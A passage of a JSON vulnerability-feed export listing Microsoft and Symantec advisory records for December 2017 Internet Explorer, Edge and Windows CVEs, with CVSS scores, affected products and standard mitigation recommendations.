vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11901"], "modified": "2018-01-26T08:00:00", "id": "MS:CVE-2017-11901", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11901", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11903"], "modified": "2018-01-26T08:00:00", "id": "MS:CVE-2017-11903", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11903", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11907"], "modified": "2018-01-26T08:00:00", "id": "MS:CVE-2017-11907", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11907", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to an information disclosure vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer and Edge CVE-2017-11919 Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11919"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102093", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102093", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:05:33", "bulletinFamily": "software", "cvelist": ["CVE-2017-11927"], "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity such as unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2017-12-12T00:00:00", "id": "SMNTC-102095", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102095", "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Windows CVE-2017-11927 Information Disclosure Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:05:33", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Windows RPC CVE-2017-11885 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11885"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102055", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102055", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "bulletinFamily": "software", "cvelist": ["CVE-2017-11887"], "description": "### Description\n\nMicrosoft Internet Explorer are prone to an information-disclosure vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2017-12-12T00:00:00", "id": "SMNTC-102063", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102063", "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11887 Information Disclosure Vulnerability", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-11T20:41:50", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge CVE-2017-11888 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11888"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102065", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102065", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:05:33", "bulletinFamily": "software", "cvelist": ["CVE-2017-11899"], "description": "### Description\n\nMicrosoft Windows is prone to a remote security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits. \n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nUsers should be cautious when installing and running application from untrusted sources. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2017-12-12T00:00:00", "id": "SMNTC-102077", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102077", "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Windows Device Guard CVE-2017-11899 Remote Security Bypass Vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-12T16:12:12", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11918 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11918"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102089", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102089", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-11T20:41:53", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11893 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11893"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102081", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102081", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:41:49", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11889 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11889"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102080", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102080", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to an information-disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Internet Explorer 9, 10 and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer Scripting Engine CVE-2017-11906 Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11906"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102078", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102078", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. Internet Explorer 11 and Edge are vulnerable.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer and Edge CVE-2017-11895 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11895"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102054", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102054", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. Internet Explorer 9, 10, 11 and Edge are vulnerable.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer and Edge CVE-2017-11894 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11894"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102053", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102053", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer are prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11886 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11886"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102062", "href": 